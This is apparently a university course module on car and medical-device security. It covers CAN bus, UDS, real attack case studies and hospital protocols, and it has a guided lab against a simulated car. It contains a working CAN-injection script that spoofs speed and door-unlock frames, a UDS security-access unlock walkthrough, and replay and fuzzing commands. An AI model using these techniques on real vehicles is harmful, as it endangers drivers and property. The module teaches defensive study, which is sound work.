Week 10 Quiz

Test your understanding of the weekly concepts.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz
CSY304 Week 10 Advanced

The "Bible" of automotive security by Craig Smith. Free PDF available.

IoT & Embedded Systems Security

Track your progress through this week's content

Opening Framing

Automotive and medical IoT represent domains where cybersecurity directly impacts human safety (Safety Critical Systems). A compromised vehicle can crash at 70MPH. A hacked insulin pump can deliver a lethal dose while a patient sleeps.

The CIA Triad Inversion: In traditional IT, Confidentiality is often king. In Safety Critical IoT, Integrity and Availability are non-negotiable. If a surgeon cannot view an X-Ray (Availability) or if the X-Ray is modified to hide a tumor (Integrity), the patient dies. Confidentiality (HIPAA) matters, but it is secondary to immediate survival.

Week Learning Outcomes:
  • Dissect a CAN Bus 2.0B Frame (Arbitration ID, DLC, Data).
  • Hack a virtual car using `socketcan` and `python-can`.
  • Unlock ECUs using UDS Service 0x27 (Security Access) bruteforcing.
  • Exploit RF vulnerabilities in Key Fobs (RollJam/Replay).
  • Analyze Medical Protocols (HL7, DICOM) for PII leakage.

1) Automotive Security Architecture

Modern cars are "Datacenters on Wheels," containing 70-100 ECUs (Electronic Control Units) running 100 million lines of code.


[ MODERN VEHICLE NETWORK TOPOLOGY ]

      (External World)
            |
      [ TELEMATICS UNIT ] <---(Cellular/GPS/WiFi)---> Cloud / Hackers
      [ INFOTAINMENT ]    <---(Bluetooth/USB)-------> User Phone
            |
      --------------------------------------------------
      [ GATEWAY ECU ] (The Firewall/Router - The Target)
      --------------------------------------------------
            |                    |                    |
    [ POWERTRAIN CAN ]    [ BODY CAN ]        [ CHASSIS CAN ]
    (High Speed, 500kbps) (Low Speed, 125kbps)(Safety Critical)
            |                    |                    |
       - Engine ECU          - Door Locks         - Brakes (ABS)
       - Transmission        - Windows            - Steering (EPS)
       - Airbags             - Lights             - Suspension
       - Sensors (O2, RPM)   - HVAC               - ADAS (Lane Keep)

Key Components

  • ECU (Electronic Control Unit): An embedded computer (often ARM or TriCore). It reads sensors and drives actuators. It has no "OS" like Linux, usually an RTOS (Like OSEK or AutoSAR).
  • CAN Bus (Controller Area Network): The primary network. It is a broadcast bus (like a walkie-talkie channel). Two wires: CAN_H and CAN_L. Differential signaling makes it immune to engine noise.
  • Gateway: The bridge between different CAN buses. Ideally, it prevents the Infotainment System (High Risk) from sending "Brake" commands to the Chassis CAN (Critical). Historically, these gateways were just "bridges" with zero filtering.
  • OBD-II Port: The physical diagnostic port under the dashboard. It provides direct access to the internal network. Mandated by law for emissions testing.

Other Protocols (The Guests)

Protocol Use Case Security Posture
LIN Seats, Mirrors, Wipers Cheap, slow, single-wire. Helper to CAN. No security.
FlexRay Drive-by-Wire, Active Suspension High speed (10Mbps), deterministic, fault-tolerant. Complexity = Obscurity.
MOST Audio/Video Optical fiber ring. Used for Multimedia. Hard to tap.
Automotive Ethernet LiDAR, Cameras, Backbone 100Mbps/1Gbps T1. Uses IP stack (TCP/UDP). Vulnerable to IT attacks.

2) Protocol Deep Dive: CAN Bus

Developed by Bosch in the 1980s. Designed for reliability, not security. It assumes "Trust Model: Everyone is Friendly."

The CAN Frame (2.0A / 11-bit ID)

Field Bits Description
Arbitration ID 11 Determines priority. Lower ID wins. (0x000 wins over 0x7FF). This allows critical messages (Brakes) to interrupt non-critical ones (Radio).
RTR 1 Remote Transmission Request. "I want data."
DLC 4 Data Length Code (0-8 bytes).
Data 0-64 The payload (8 bytes max for CAN Classic).
CRC 15 Cyclic Redundancy Check (Error detection, not security).
Security Flaws:
  1. Broadcast: Every ECU sees every message. A compromised Radio can sniff the Engine.
  2. No Source Auth: You can't prove who sent a message. Impersonation (Spoofing) is trivial.
  3. No Encryption: Data is cleartext. 0x03E8 is mostly likely 1000 RPM.
  4. DoS Susceptible: Flooding ID 0x000 (Highest Priority) freezes the bus completely.

3) Going Deeper: ISO-TP and UDS

CAN only holds 8 bytes. What if you want to send a firmware update (1MB)? You need a Transport Layer.

ISO-TP (ISO 15765-2)

Splits large data into multiple CAN frames. It adds a "Protocol Control Information" (PCI) byte.

UDS (Unified Diagnostic Services - ISO 14229)

This is the application layer on top of ISO-TP. It's used by mechanics to diagnose cars and by hackers to own them.

Service ID Name Description Hacker Usage
0x10 Diagnostic Session Control Switch session modes (Default, Programming, Extended). Switch to "Programming Session" (0x02) to flash firmware.
0x11 ECU Reset Hard or Soft Reset. Reboot the ECU (DoS or apply changes).
0x22 Read Data By ID Read PIDs (VIN, Firmware Ver). Recon: "What software version is this ECU running?"
0x27 Security Access Seed/Key Authentication. The Holy Grail. Unlock privileged modes.
0x2E Write Data By ID Write Config Strings. Change VIN, Odometer, Enable Features.
0x31 Routine Control Execute built-in tests. Trigger tests: "Unlock Doors", "Fire ABS", "Wipe Memory".
0x3E Tester Present Keep-alive heartbeat. Prevents session timeout during attacks.
0x85 Control DTC Settings Disable Error Logging. "Ghost Mode": Attacks don't leave logs.
UDS Exploit: Service 0x27 Seed-Key Bruteforce

// 1. Hacker Requests Seed for Level 1 Access
TX: 0x7E0 [02 27 01 00 00 00 00 00] (02=Len, 27=Service, 01=Level)

// 2. ECU Replies with Seed
RX: 0x7E8 [06 67 01 DE AD BE EF 00] (67=Positive Response, Seed=DEADBEEF)

// 3. Hacker Must Compute Key = F(Seed)
// If F is unknown, we reverse engineer the firmware or Bruteforce.
// Let's say F(x) = x XOR 0xFFFFFFFF
Key = 21 52 41 10

// 4. Hacker Sends Key
TX: 0x7E0 [06 27 02 21 52 41 10 00]

// 5. ECU Grants Access
RX: 0x7E8 [02 67 02 00 00 00 00 00] (Success!)

4) Automotive Attack Case Studies

A) The Jeep Cherokee Hack (2015) - Remote Kill

Researchers: Charlie Miller & Chris Valasek.

Impact: 1.4 Million vehicles recalled. First mass remote hack.

The Kill Chain

  1. Recon: Scanning the Sprint Cellular range found cars with open port 6667 (D-Bus).
  2. Entry: No authentication required on D-Bus. They could query the system and execute code on the OMAP chip (Infotainment Head Unit).
  3. Pivot: The Head Unit is connected to the V850 Gateway chip via SPI (Serial Peripheral Interface).
  4. Persistence: They rewrote the V850 firmware to a malicious version that allowed "Sending arbitrary CAN messages" from the Head Unit to the Safety CAN.
  5. Effect: They could send commands to the Steering (EPS) and Brakes (ABS) because the Gateway was now their zombie.

B) Tesla Model X Key Fob (2020) - Fast & Furious

Researcher: Lennert Wouters.

Target: BLE (Bluetooth Low Energy) Key Fobs.

The Kill Chain

  1. Recon: Bought a used Body Control Module (BCM) on eBay to study it. Found it used a BLE chip.
  2. Vulnerability: The firmware update process for the KEY FOB itself was not properly signed.
  3. Attack:
    • Walk up to a Tesla (15 meters range).
    • Push a malicious firmware update to the owner's Key Fob ( wirelessly).
    • The compromised Key Fob now gives up its cryptographic secrets.
    • Use those secrets to clone the key.
    • Unlock car, start engine, drive away.
  4. Time: < 90 seconds. Equipment cost: $300 (Raspberry Pi + BLE dongle).

5) Medical Device Security: Do No Harm

Context: Medical ecosystem is split into HDOs (Healthcare Delivery Organizations - Hospitals) and MDMs (Medical Device Manufacturers).

Hospital Protocols: The Soft Underbelly

Hospitals are notoriously insecure. They prioritize "Emergency Access" over "Security".

HL7 (Health Level 7)

The standard for moving patient data (ADT - Admission, Discharge, Transfer). OLD versions (v2.x) are widely used and act like Telnet.

HL7 v2 Message (Cleartext PII)

MSH|^~\&|EPIC|HOSPITAL|LAB|HOSPITAL|20260122||ADT^A01|MSG00001|P|2.3
PID|1||1001^^^MRN||DOE^JOHN||19800101|M|||123 MAIN ST^^CITY^STATE
PV1|1|I|200^BED1||||1234^DOCTOR^STRANGE

Risk: Anyone on the hospital WiFi can sniff this. It contains Name, DOB, Address, SSN, and Diagnosis.

DICOM (Digital Imaging and Communications in Medicine)

Used for X-Rays, MRIs, CTs. Often runs on Port 104.

Vulnerability: DICOM servers usually accept connections from ANY IP. "We need the doctor to see the scan NOW."

Implantable Medical Devices (IMDs)

Pacemakers / Insulin Pumps.

6) Regulations & Standards

The "Wild West" era is ending. Governments are stepping in.

Automotive

Medical

Guided Lab: Car Hacking with Python

Objective: Use `python-can` to interact with a simulated vehicle.

Tools: `ICSim` (Instrument Cluster Simulator), `python-can`.

Step 1: Setup vcan0 (Virtual CAN)

Bash: Setup

# Load kernel module
sudo modprobe vcan
# Create interface
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

# Install Tools
sudo apt install can-utils python3-can git
git clone https://github.com/zombieCraig/ICSim.git
cd ICSim && make
# Start Dashboard & Controls
./icsim vcan0 &
./controls vcan0 &

Step 2: Sniffing (Recon)

Watch the traffic. Look for IDs that change when you use the controller.


# Dump all traffic
candump vcan0

# Sniffer (Colorized changes - AMAZING tool)
cansniffer -c vcan0

Observation: You look for patterns. "When I press Left Blinker, ID 0x188 changes from 00 to 01."

Step 3: The Attack Script (Python)

We will write a script that overrides the Speedometer.

Python: car_hack.py

import can
import time

# CONFIG
BUS_NAME = 'vcan0'
SPEEDOMETER_ID = 0x244
DOOR_LOCK_ID = 0x19B

# Setup the Bus
bus = can.interface.Bus(BUS_NAME, bustype='socketcan')
print(f"[*] Attacking {BUS_NAME}...")

try:
    while True:
        # Attack 1: Pin Speedometer to 255 MPH
        # Data: [00, 00, FF, FF, FF, ... ]
        speed_msg = can.Message(
            arbitration_id=SPEEDOMETER_ID,
            data=[0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00],
            is_extended_id=False
        )
        bus.send(speed_msg)

        # Attack 2: Unlock Doors continuously
        # Data: [00, 00, 0F, ...] (Hypothetically 0F = Unlock)
        door_msg = can.Message(
            arbitration_id=DOOR_LOCK_ID,
            data=[0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00],
            is_extended_id=False
        )
        bus.send(door_msg)
        
        # Super fast loop to win arbitration
        time.sleep(0.002) 
        
except KeyboardInterrupt:
    print("\n[!] Attack Stopped. You can now brake.")

Result: Real input is ignored. The car obeys your Python script.

XP REWARD: +750 XP (Torque Agent)

Appendix A: SocketCAN Cheat Sheet

Command Description
candump vcan0 Dump all traffic (WireShark for CLI).
candump -l vcan0 Log traffic to a file (for replay).
canplayer -I candump.log Replay a captured log (Replay Attack).
cansniffer -c vcan0 Visual traffic analysis (Rows disappear if static).
cansend vcan0 123#DEADBEEF Send 1 frame (ID 123, Data DEADBEEF).
cangen vcan0 Generate random noise (Fuzzing).
isotpsniffer -s 244 -d 555 vcan0 Decode ISO-TP (Transport Protocol) multi-frame messages.

Appendix B: Polyglot Car Hacking

How to interact with CAN in different languages.

C (Native SocketCAN)


#include <linux/can.h>
#include <linux/can/raw.h>

int s = socket(PF_CAN, SOCK_RAW, CAN_RAW);
struct ifreq ifr;
strcpy(ifr.ifr_name, "vcan0");
ioctl(s, SIOCGIFINDEX, &ifr);

struct sockaddr_can addr;
addr.can_family = AF_CAN;
addr.can_ifindex = ifr.ifr_ifindex;
bind(s, (struct sockaddr *)&addr, sizeof(addr));

struct can_frame frame;
frame.can_id = 0x123;
frame.can_dlc = 2;
frame.data[0] = 0x11;
frame.data[1] = 0x22;
write(s, &frame, sizeof(frame));

Go (go-rpi-can)


conn, _ := can.NewReadWriteCloser("vcan0")
frame := can.Frame{
    ID:   0x123,
    Data: []byte{0x11, 0x22},
}
conn.WriteFrame(frame)

Appendix C: FDA 510(k) Cybersecurity Checklist

Appendix D: Common UDS Negative Response Codes (NRCs)

When your attack fails, the ECU tells you why. These codes are critical for debugging exploits.

Code (Hex) Name Meaning
0x10 General Reject "I don't like this request." (Generic error).
0x11 Service Not Supported "I don't know what Service 0x27 is." (Target doesn't allow Security Access).
0x12 Subfunction Not Supported "I know 0x27, but I don't support Level 03."
0x13 Incorrect Message Length "You sent 5 bytes, I expected 4." (Check packet structure).
0x22 Conditions Not Correct "I can't do this right now." (e.g., Engine is running, Speed > 0).
0x31 Request Out of Range "That VIN is too long."
0x33 Security Access Denied "You didn't unlock me with Seed/Key first."
0x35 Invalid Key "Wrong Key. Seed was DEADBEEF, you sent CAFEBABE."
0x36 Exceeded Number of Attempts "You guessed wrong 3 times. Locked out for 10 minutes." (Bruteforce protection).

Appendix E: Car Hacking Resources

The Car Hacker's Handbook

The "Bible" of automotive security by Craig Smith. Free PDF available.

 ICSim (Instrument Cluster Simulator)

The safe way to learn CAN bus hacking without bricking your own car.

 Charlie Miller & Chris Valasek Research

Original whitepapers on the Jeep Cherokee and Ford Escape hacks.